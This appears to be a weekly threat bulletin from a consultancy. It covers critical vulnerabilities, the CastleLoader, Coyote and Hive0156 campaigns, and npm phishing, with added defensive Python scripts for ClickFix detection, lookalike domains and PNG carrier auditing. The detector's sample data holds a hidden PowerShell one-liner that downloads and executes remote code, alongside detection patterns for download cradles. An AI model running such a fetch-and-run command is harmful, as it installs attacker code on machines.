Top Cyber Threats During: 21st July – 27th July 2025

7/29/2025

In today’s evolving threat landscape, staying ahead of cybersecurity risks requires timely intelligence and proactive defense. This week's bulletin highlights multiple critical vulnerabilities across widely used platforms such as Sophos Firewall, Google Chrome, AWS Client VPN, and Apache Jena, all demanding urgent attention and patching. We also cover major attack campaigns including the Allianz Life Insurance data breach, sophisticated CastleLoader malware infections, and new techniques like UI Automation abuse by Coyote malware. From developer-targeted phishing in the npm ecosystem to cyber espionage campaigns against government and military entities, this edition provides a comprehensive snapshot of emerging risks and practical mitigation strategies to help organizations enhance their security posture.

Section 1: Critical Vulnerabilities to Patch Immediately

1. Sophos Firewall – Remote Code Execution (RCE) Flaws

Sophos has disclosed two critical vulnerabilities (CVE-2025-6704 and CVE-2025-7624) in Sophos Firewall (SFOS), both carrying a CVSS score of 9.8. CVE-2025-6704 is an arbitrary file write in the Secure PDF eXchange (SPX) feature that can lead to pre-authentication remote code execution when a specific SPX configuration is enabled and the firewall is running in High Availability (HA) mode. CVE-2025-7624 is a SQL injection in the legacy (transparent) SMTP proxy that can lead to remote code execution when an email quarantining policy is active and the appliance was upgraded from a version older than 21.0 GA. The same advisory also covers a high-severity OS command injection in WebAdmin (CVE-2025-7382).
Both critical flaws are reachable through the firewall's email-handling paths, so exposure does not depend on the admin interface being reachable. The fix is contained in v21.0 MR2 and later; Sophos also delivered hotfixes to supported earlier releases for appliances with automatic hotfix installation enabled. Organizations that disabled that setting, or that run firmware older than v21.0 MR2, should verify the hotfix status and patch immediately.
More details: https://www.sophos.com/en-us/security-advisories/sophos-sa-20250721-sfos-rce

2. Apache Jena Fuseki Server – File Access and Directory Traversal

Two vulnerabilities (CVE-2025-49656 & CVE-2025-50151) affect Apache Jena up to and including v5.4.0, with CVSS scores of 7.5 and 8.8 respectively. CVE-2025-49656 lets an administrative user of the Fuseki server create files outside the server's files area (an arbitrary file write), and CVE-2025-50151 lets a configuration file uploaded through the admin interface read arbitrary local files. Together they expose logs and secrets on the host and allow poisoning of files the server later loads.
Both require valid administrative credentials, which makes them a post-compromise or insider risk rather than a remote entry point, but in practice they turn Fuseki admin access into the privileges of the OS account running Fuseki. Upgrade to Apache Jena 5.5.0; in the meantime restrict the admin interface to trusted networks and run Fuseki under a low-privilege service account.

More details: https://jena.apache.org/security/advisories.html

3. AWS Client VPN for Windows – Local Privilege Escalation

CVE-2025-8069 is a local privilege escalation in the installer of the AWS Client VPN for Windows. During installation the installer loads an OpenSSL configuration file from a fixed path inside a directory that standard users can write to; a local, non-administrative user who plants a malicious configuration file there gets code executed with SYSTEM privileges the next time the installer runs.
The flaw affects only the Windows client (the macOS and Linux clients are not affected), but it matters on shared or multi-user machines and wherever software-deployment tools run the installer as SYSTEM. Fixed in version 5.2.2; earlier versions should be upgraded.

More details: https://aws.amazon.com/security/security-bulletins/AWS-2025-014/

4. Google Chrome – Emergency Update to Fix Code Execution Bugs

Two high-severity type confusion bugs (CVE-2025-8010 & CVE-2025-8011) in Chrome's V8 JavaScript engine were patched in a stable channel update. A V8 type confusion reached from a crafted HTML page typically gives the attacker arbitrary code execution inside the renderer process; reaching the operating system additionally requires a sandbox escape, so the renderer sandbox and site isolation remain the containment layer while the update rolls out.
All users should update Chrome to 138.0.7204.168/.169 (the exact build varies by platform), and users of Chromium-based browsers (Edge, Opera, Brave) should apply their vendors' corresponding updates.

More details: https://chromereleases.googleblog.com/2025/07/stable-channel-update-for-desktop_22.html

Section 2: Emerging Threat Campaigns

Allianz Life Insurance Data Breach

A major breach affected 1.4 million customers of Allianz Life Insurance, reportedly due to compromise of a third-party cloud CRM system.
Allianz attributes the intrusion to a social engineering attack against the CRM vendor, and public reporting links it to the Scattered Spider group. Allianz states that its own network and policy administration systems were not accessed; the exposed records include names, contact details and potentially Social Security numbers of customers, financial professionals and some employees.
Allianz is offering 24 months of identity protection and has notified the FBI. The incident underscores that a vendor's help-desk and MFA-reset procedures are part of your own attack surface: require phishing-resistant MFA on SaaS administrator accounts, and know what customer data each third party holds.

CastleLoader Malware – A Sophisticated Phishing Campaign

CastleLoader is a malware loader, active since early 2025, that is distributed through ClickFix-style lures: Cloudflare-branded "verify you are human" pages, fake browser-update and developer-tool sites, and bogus GitHub repositories copy a PowerShell one-liner to the victim's clipboard and instruct them to paste it into the Run dialog (Win+R).
The pasted command downloads and executes the loader, which then delivers payloads such as DeerStealer, RedLine, StealC, NetSupport RAT, SectopRAT and HijackLoader.
Defenders should alert on PowerShell spawned from explorer.exe with hidden-window, execution-policy-bypass or download-cradle arguments; restrict PowerShell for standard users through Constrained Language Mode or application control rather than removing it (it is needed for management); deploy EDR; and train users that no legitimate site asks them to paste commands into Run. The RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) records what was pasted and is worth collecting during investigations.

More details: https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview

Section 3: Security Headlines You Shouldn’t Miss

Coyote Malware Exploits Microsoft UI Automation

The Coyote banking trojan now abuses Microsoft's legitimate UI Automation (UIA) accessibility framework to discover which banking or cryptocurrency-exchange site a victim has open: instead of hooking the browser, it walks the browser's UI element tree through UIA, reads the address bar and tab titles, and compares them against a list of roughly 75 Brazilian banks and exchanges before stealing credentials.
Because UIA is a signed, legitimate Windows component used by screen readers, this activity does not stand out to detections focused on API hooking or code injection. Akamai describes it as the first confirmed in-the-wild abuse of UIA, a technique previously shown only in research. A practical detection is to watch for processes outside the expected set (screen readers, browsers, automation tools) loading UIAutomationCore.dll.

More details: https://www.akamai.com/blog/security-research/active-exploitation-coyote-malware-first-ui-automation-abuse-in-the-wild
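
The two detection ideas above, for the CastleLoader/ClickFix launch pattern and for Coyote-style UI Automation abuse, worked through as one script. This is an added example, not code from PRODAFT, Akamai or the bulletin: the events are constructed Sysmon-style records (ProcessCreate, Event ID 1, and ImageLoad, Event ID 7), and the command-line indicators, the UIA process allow-list and the trusted-directory list are assumptions to be tuned for your environment.

```python
"""
Detection over constructed Sysmon-style events (sample data, not real telemetry):
  * ClickFix / CastleLoader: a shell spawned with several paste-and-run traits
    (hidden window, policy bypass, encoded command, download cradle, iex).
  * Coyote: a process outside the expected set loading UIAutomationCore.dll.
"""
import re

SAMPLE_EVENTS = [
    # ClickFix: the clipboard was pasted into Win+R, so explorer.exe is the parent.
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/v.txt | iex"'},
    # Benign: an IDE running a build script.
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
    # Benign: the screen reader loads the UIA library.
    {"EventID": 7, "Image": r"C:\Windows\System32\narrator.exe",
     "ImageLoaded": r"C:\Windows\System32\UIAutomationCore.dll"},
    # Coyote-style: an unknown binary in a user-writable path loads UIA.
    {"EventID": 7, "Image": r"C:\Users\alice\AppData\Roaming\Updater\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\UIAutomationCore.dll"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
RUN_DIALOG_PARENT = "explorer.exe"

# Traits of pasted one-liners (assumption; extend from your own ClickFix samples).
CLICKFIX_INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass":   re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b", re.I),
    "expression_eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}

# Processes expected to use UI Automation legitimately (assumption; tune per estate).
UIA_ALLOWLIST = {"narrator.exe", "magnify.exe", "explorer.exe", "inspect.exe",
                 "chrome.exe", "msedge.exe", "firefox.exe", "teams.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def win_basename(path):
    """Lower-case file name of a Windows path (os.path would not split backslashes on Linux)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def clickfix_indicators(cmdline):
    """Names of the ClickFix-style traits present in a command line."""
    return [name for name, rx in CLICKFIX_INDICATORS.items() if rx.search(cmdline)]


def in_trusted_dir(path):
    return path.lower().startswith(TRUSTED_DIRS)


def detect(events):
    alerts = []
    for ev in events:
        image = win_basename(ev.get("Image", ""))
        if ev["EventID"] == 1 and image in SHELLS:
            hits = clickfix_indicators(ev.get("CommandLine", ""))
            parent = win_basename(ev.get("ParentImage", ""))
            # Two traits together are rare in admin scripts; from the Run dialog it is the ClickFix pattern.
            if len(hits) >= 2:
                rule = "clickfix_run_dialog" if parent == RUN_DIALOG_PARENT else "suspicious_shell"
                alerts.append({"rule": rule, "image": ev["Image"], "detail": ",".join(hits)})
        elif ev["EventID"] == 7 and win_basename(ev.get("ImageLoaded", "")) == "uiautomationcore.dll":
            # An allow-listed name only counts when it runs from a trusted directory,
            # so a lookalike dropped into AppData does not slip through.
            if image not in UIA_ALLOWLIST or not in_trusted_dir(ev["Image"]):
                alerts.append({"rule": "uia_library_load", "image": ev["Image"],
                               "detail": "unexpected process loaded UIAutomationCore.dll"})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed events, the script raises exactly two alerts: the pasted PowerShell from explorer.exe and the AppData binary loading UIAutomationCore.dll; the IDE build script and Narrator pass. The UIA rule will need an allow-list pass in any estate that runs RPA or test-automation tooling, which is why the allow-list is tied to trusted install paths rather than to names alone.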

npm Phishing Campaign Targets Developers

Attackers sent phishing emails impersonating npm support that linked to a typosquatted domain, npnjs.com, which mirrors the real npmjs.com login page to harvest maintainers' credentials and tokens.
At least one maintainer was compromised this way, and malicious versions of widely used packages were then published under that account. Developers are urged to enable 2FA (npm's WebAuthn-based option resists this kind of phishing where a TOTP code does not), rotate any token entered on a suspicious page, verify the domain before logging in, and review lockfile changes that pull in unexpected package versions.

More details: https://socket.dev/blog/npm-phishing-email-targets-developers-with-typosquatted-domain
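
A lookalike-domain check of the kind that would have caught the npnjs.com lure, run over a constructed phishing email. This is an added example, not code from Socket or the bulletin; the trusted-domain list, the homoglyph table and the sample email are assumptions or constructed data, and the registrable-domain logic deliberately ignores public-suffix rules (two-level TLDs such as co.uk) to stay short.

```python
"""
Flag links whose domain is a near-miss of a trusted domain (edit distance 1,
homoglyph swap) or that use a trusted brand as a subdomain of something else.
"""
import re
from urllib.parse import urlparse

TRUSTED_DOMAINS = ("npmjs.com", "npmjs.org", "github.com")   # assumption: your allow-list

# Character pairs commonly swapped in lookalike domains (not exhaustive).
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("cl", "d")]

URL_RE = re.compile(r"https?://[^\s<>\"')\]]+")

# Constructed phishing email body (sample data for this example, not a real message).
SAMPLE_EMAIL = """\
From: npm support <support@npnjs.com>
Subject: Please verify your email address

Your account will be locked unless you verify it within 48 hours:
https://npnjs.com/login?next=/settings
Manage your tokens at https://www.npmjs.com/settings/tokens
Questions? https://npmjs.com.account-review.net/help
"""


def registrable_domain(host):
    """Last two labels of a host name (assumption: no public-suffix handling)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def normalize(label):
    """Collapse common homoglyph pairs so 'rnpmjs' compares equal to 'mpmjs'."""
    for src, dst in HOMOGLYPHS:
        label = label.replace(src, dst)
    return label


def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_url(url):
    """Return (verdict, reason) where verdict is trusted, lookalike or unknown."""
    host = (urlparse(url).hostname or "").lower()
    domain = registrable_domain(host)
    if domain in TRUSTED_DOMAINS:
        return "trusted", domain
    sld = domain.split(".")[0]
    for trusted in TRUSTED_DOMAINS:
        t_sld = trusted.split(".")[0]
        if normalize(sld) == normalize(t_sld) or levenshtein(sld, t_sld) <= 1:
            return "lookalike", f"{domain} resembles {trusted}"
        # Brand used as a subdomain of an unrelated domain, e.g. npmjs.com.evil.net
        if t_sld in host.split("."):
            return "lookalike", f"{trusted} used as subdomain of {domain}"
    return "unknown", domain


def scan_email(text):
    """(url, verdict, reason) for every http(s) link in the message body."""
    return [(url, *classify_url(url)) for url in URL_RE.findall(text)]


if __name__ == "__main__":
    for url, verdict, reason in scan_email(SAMPLE_EMAIL):
        print(f"{verdict:9} {url}  ({reason})")
```

On the sample message the npnjs.com login link and the npmjs.com.account-review.net link are flagged as lookalikes while the genuine token-management link is trusted. The sender address is not checked here; in a mail gateway you would apply the same classification to the From domain and to any display-name URL as well.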

Hive0156 Targets Ukrainian Government with Advanced Espionage

IBM X-Force reports that Hive0156, a Russia-aligned group, continues to deliver the Remcos RAT to Ukrainian military and government entities using weaponized documents and LNK files that launch PowerShell.
The chain stages HijackLoader, with components hidden inside PNG images (steganography), before Remcos is deployed. The group's lures and targeting have broadened beyond military and government users to a wider set of Ukrainian victims, and its loaders and infrastructure are rotated frequently to stay ahead of signatures.

More details: https://www.ibm.com/think/x-force/hive0156-continues-remcos-campaigns-against-ukraine
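
A structural PNG audit that a triage pipeline can apply to image attachments and downloads. This is an added example, not IBM X-Force's or the bulletin's code, and it is a generic check for crude PNG carriers (data appended after IEND, oversized or non-standard private chunks, bad CRCs) rather than a decoder for the specific Hive0156/HijackLoader encoding, which the report linked above does not detail; true pixel-level steganography is not detected by it. The sample images and the 4 KiB ancillary-chunk threshold are constructed assumptions.

```python
"""
Walk a PNG's chunk list and report what does not belong in an image.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
STANDARD_CHUNKS = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"gAMA", b"cHRM", b"sRGB",
                   b"iCCP", b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"pHYs", b"sBIT", b"sPLT",
                   b"hIST", b"tIME", b"eXIf"}
ANCILLARY_LIMIT = 4096   # assumption: non-image chunks larger than this deserve a look


def chunk(ctype, body):
    """Serialize one PNG chunk (length, type, data, CRC over type+data)."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def tiny_png(extra_chunks=b""):
    """A valid 1x1 RGB PNG (constructed sample); extra chunks are placed before IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # width, height, bit depth, RGB
    scanline = b"\x00\xff\x00\x00"                       # filter byte + one red pixel
    return (PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(scanline))
            + extra_chunks + chunk(b"IEND", b""))


def audit_png(data):
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    findings = {"chunks": [], "crc_errors": [], "nonstandard_chunks": [],
                "large_ancillary": [], "trailing_bytes": 0, "truncated": False}
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if len(body) < length or pos + 12 + length > len(data):
            findings["truncated"] = True
            break
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        name = ctype.decode("latin-1")
        findings["chunks"].append(name)
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            findings["crc_errors"].append(name)
        if ctype not in STANDARD_CHUNKS:
            findings["nonstandard_chunks"].append(name)
        # A lower-case first letter (bit 5 set) marks an ancillary chunk; pixel data
        # only ever lives in IHDR/PLTE/IDAT, so a big ancillary chunk is a carrier candidate.
        if ctype[0] & 0x20 and length > ANCILLARY_LIMIT:
            findings["large_ancillary"].append(name)
        pos += 12 + length
        if ctype == b"IEND":
            break
    # Anything after IEND is ignored by every decoder, which is exactly why loaders use it.
    findings["trailing_bytes"] = len(data) - pos
    return findings


def is_suspicious(findings):
    return bool(findings["trailing_bytes"] or findings["nonstandard_chunks"]
                or findings["large_ancillary"] or findings["crc_errors"])


if __name__ == "__main__":
    samples = [("clean", tiny_png()),
               ("appended payload", tiny_png() + b"MZ" + bytes(100)),
               ("private chunk", tiny_png(chunk(b"paYl", b"\x90" * 5000)))]
    for label, blob in samples:
        result = audit_png(blob)
        print(f"{label:17} suspicious={is_suspicious(result)} {result}")
```

The clean sample yields IHDR, IDAT, IEND and nothing flagged; the second reports 102 trailing bytes; the third reports a non-standard 5000-byte ancillary chunk named paYl. Pair this with a renderer that confirms the file actually decodes: an image that both decodes cleanly and carries a large opaque chunk is the typical loader carrier.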

Recommended Actions This Week

  • Patch the Sophos Firewall, Chrome, AWS Client VPN and Apache Jena issues above; for Sophos, confirm the hotfix is actually present rather than assuming automatic installation.
  • Audit privileged installations: any installer or agent that runs as SYSTEM and reads from a user-writable path is a privilege-escalation candidate, as CVE-2025-8069 shows.
  • Educate employees about advanced phishing (Cloudflare "verify you are human" pages, fake GitHub repositories, npm-branded emails) and the rule that no legitimate site asks you to paste a command into Win+R.
  • Monitor for PowerShell spawned from explorer.exe with hidden-window, policy-bypass or download-cradle arguments, and collect the RunMRU key in investigations, especially on developer or shared machines.
  • Add EDR rules that flag unexpected processes loading UIAutomationCore.dll and binaries in user-writable paths performing DLL injection.

Stay informed, stay secure.
Subscribe to receive weekly alerts, advisories, and actionable insights directly in your inbox.
For consultation and for tailored cybersecurity advisory, contact our Cyber Threat Management team at Crowe UAE,

+971 55 343 8693, [email protected]